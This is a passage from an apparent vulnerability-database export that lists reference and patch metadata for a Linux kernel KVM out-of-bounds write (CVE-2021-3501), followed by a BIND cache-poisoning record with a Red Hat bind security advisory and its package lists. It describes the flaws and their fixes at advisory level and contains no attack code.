"db": "AUSCERT",
"id": "ESB-2021.1919",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1868",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2131",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "162890",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "162882",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "163242",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-391161",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2021-3501",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163188",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
},
{
"db": "PACKETSTORM",
"id": "162977"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"id": "VAR-202105-0904",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
}
],
"trust": 0.01
},
"last_update_date": "2026-04-10T22:39:10.303000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Bug\u00a01950136",
"trust": 0.8,
"url": "http://www.kernel.org"
},
{
"title": "Linux kernel Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=150809"
},
{
"title": "Red Hat: CVE-2021-3501",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2021-3501"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-3501 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "Out-of-bounds writing (CWE-787) [ Other ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.8,
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1950136"
},
{
"trust": 1.8,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=04c4f2ee3f68c9a4bf1653d15f1a9a435ae33f7a"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3501"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20210618-0008/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2021-3501"
},
{
"trust": 0.6,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.6,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162977/ubuntu-security-notice-usn-4983-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2131"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1919"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163149/red-hat-security-advisory-2021-2286-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-kvm-35276"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162936/ubuntu-security-notice-usn-4977-1.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/162881/red-hat-security-advisory-2021-2169-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1868"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1945"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2021-3543"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-27219"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-27219"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15358"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21639"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12364"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28165"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28092"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25037"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13776"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24977"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24330"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28935"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28163"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13434"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2017-14502"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8285"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26116"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14866"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-26137"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21309"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21640"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29361"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25042"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12362"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25648"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25038"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8648"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25032"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27170"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-25215"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3177"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-25692"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3326"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25036"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25013"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25035"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-2433"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8927"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3347"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-29363"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24332"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3114"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-28362"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3842"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10543"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25039"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12364"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2461"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2286"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3121"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2287"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24489"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3560"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2522"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/articles/2974891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24489"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3560"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2169"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2165"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2168"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1029.30"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4983-1"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391161"
},
{
"db": "VULMON",
"id": "CVE-2021-3501"
},
{
"db": "PACKETSTORM",
"id": "163188"
},
{
"db": "PACKETSTORM",
"id": "163149"
},
{
"db": "PACKETSTORM",
"id": "163242"
},
{
"db": "PACKETSTORM",
"id": "162881"
},
{
"db": "PACKETSTORM",
"id": "162882"
},
{
"db": "PACKETSTORM",
"id": "162890"
},
{
"db": "PACKETSTORM",
"id": "162977"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
},
{
"db": "NVD",
"id": "CVE-2021-3501"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-391161",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-3501",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163188",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163149",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163242",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162881",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162882",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162890",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162977",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-3501",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-05-06T00:00:00",
"db": "VULHUB",
"id": "VHN-391161",
"ident": null
},
{
"date": "2021-05-06T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3501",
"ident": null
},
{
"date": "2021-06-17T17:53:22",
"db": "PACKETSTORM",
"id": "163188",
"ident": null
},
{
"date": "2021-06-15T14:59:25",
"db": "PACKETSTORM",
"id": "163149",
"ident": null
},
{
"date": "2021-06-22T19:34:25",
"db": "PACKETSTORM",
"id": "163242",
"ident": null
},
{
"date": "2021-06-01T15:03:46",
"db": "PACKETSTORM",
"id": "162881",
"ident": null
},
{
"date": "2021-06-01T15:04:05",
"db": "PACKETSTORM",
"id": "162882",
"ident": null
},
{
"date": "2021-06-01T15:11:57",
"db": "PACKETSTORM",
"id": "162890",
"ident": null
},
{
"date": "2021-06-04T13:47:07",
"db": "PACKETSTORM",
"id": "162977",
"ident": null
},
{
"date": "2021-05-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-271",
"ident": null
},
{
"date": "2022-01-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"ident": null
},
{
"date": "2021-05-06T13:15:12.840000",
"db": "NVD",
"id": "CVE-2021-3501",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-05-13T00:00:00",
"db": "VULHUB",
"id": "VHN-391161",
"ident": null
},
{
"date": "2021-05-14T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3501",
"ident": null
},
{
"date": "2021-06-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202105-271",
"ident": null
},
{
"date": "2022-01-13T08:56:00",
"db": "JVNDB",
"id": "JVNDB-2021-006584",
"ident": null
},
{
"date": "2022-05-13T20:52:55.127000",
"db": "NVD",
"id": "CVE-2021-3501",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "162977"
},
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
}
],
"trust": 0.7
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Out-of-bounds Vulnerability in Microsoft",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-006584"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202105-271"
}
],
"trust": 0.6
}
}
VAR-202203-0664
Vulnerability from variot - Updated: 2026-04-10 22:16
BIND 9.11.0 -> 9.11.36 9.12.0 -> 9.16.26 9.17.0 -> 9.18.0 BIND Supported Preview Editions: 9.11.4-S1 -> 9.11.36-S1 9.16.8-S1 -> 9.16.26-S1 Versions of BIND 9 earlier than those shown - back to 9.1.0, including Supported Preview Editions - are also believed to be affected but have not been tested as they are EOL. The cache could become poisoned with incorrect records leading to queries being made to the wrong servers, which might also result in false information being returned to clients. Bogus NS records supplied by the forwarders may be cached and used by named if it needs to recurse for any reason. This issue causes it to obtain and pass on potentially incorrect answers. (CVE-2021-25220) By flooding the target resolver with queries exploiting this flaw an attacker can significantly impair the resolver's performance, effectively denying legitimate clients access to the DNS resolution service. (CVE-2022-2795) By spoofing the target resolver with responses that have a malformed ECDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38177) By spoofing the target resolver with responses that have a malformed EdDSA signature, an attacker can trigger a small memory leak. It is possible to gradually erode available memory to the point where named crashes for lack of resources. (CVE-2022-38178). -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
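For readers unfamiliar with the forwarding mode the CVE-2021-25220 text refers to, a minimal named.conf sketch follows. The forwarder address is a documentation placeholder, not taken from this record; the comments describe standard BIND semantics.

```conf
// Minimal sketch of a forwarding resolver, the configuration that
// CVE-2021-25220 concerns. 192.0.2.53 is a placeholder address.
options {
    recursion yes;
    forwarders { 192.0.2.53; };
    // "forward first" queries the forwarders, then falls back to
    // ordinary recursion if they do not answer; it is this fallback
    // path that could reuse bogus NS records cached from a
    // forwarder's responses. "forward only" never recurses directly.
    forward first;
};
```

Per the affected ranges quoted above, the fix landed in the releases immediately following them.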
====================================================================
Red Hat Security Advisory
Synopsis:          Moderate: bind security update
Advisory ID:       RHSA-2023:0402-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0402
Issue date:        2023-01-24
CVE Names:         CVE-2021-25220 CVE-2022-2795
====================================================================
1. Summary:
An update for bind is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.
Security Fix(es):
* bind: DNS forwarders - cache poisoning vulnerability (CVE-2021-25220)

* bind: processing large delegations may severely degrade resolver performance (CVE-2022-2795)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
4. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing the update, the BIND daemon (named) will be restarted automatically.
5. Bugs fixed (https://bugzilla.redhat.com/):
2064512 - CVE-2021-25220 bind: DNS forwarders - cache poisoning vulnerability
2128584 - CVE-2022-2795 bind: processing large delegations may severely degrade resolver performance
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
x86_64: bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.i686.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: bind-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.i686.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-export-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-lite-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-devel-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.i686.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-9.11.4-26.P2.el7_9.13.x86_64.rpm bind-sdb-chroot-9.11.4-26.P2.el7_9.13.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: bind-9.11.4-26.P2.el7_9.13.src.rpm
noarch: bind-license-9.11.4-26.P2.el7_9.13.noarch.rpm
ppc64: bind-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-chroot-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.ppc.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-libs-9.11.4-26.P2.el7_9.13.ppc.rpm bind-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.ppc.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm bind-utils-9.11.4-26.P2.el7_9.13.ppc64.rpm
ppc64le: bind-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-chroot-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm bind-utils-9.11.4-26.P2.el7_9.13.ppc64le.rpm
s390x: bind-9.11.4-26.P2.el7_9.13.s390x.rpm bind-chroot-9.11.4-26.P2.el7_9.13.s390x.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.s390.rpm bind-debuginfo-9.11.4-26.P2.el7_9.13.s390x.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.s390.rpm bind-export-libs-9.11.4-26.P2.el7_9.13.s390x.rpm bind-libs-9.11.4-26.P2.el7_9.13.s390.rpm bind-libs-9.11.4-26.P2.el7_9.13.s390x.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.s390.rpm bind-libs-lite-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390.rpm bind-pkcs11-libs-9.11.4-26.P2.el7_9.13.s390x.rpm bind-pkcs11-utils-9.11.4-26.P2.el7_9.13.s390x.rpm bind-utils-9.11.4-26.P2.el7_9.13.s390x.rpm
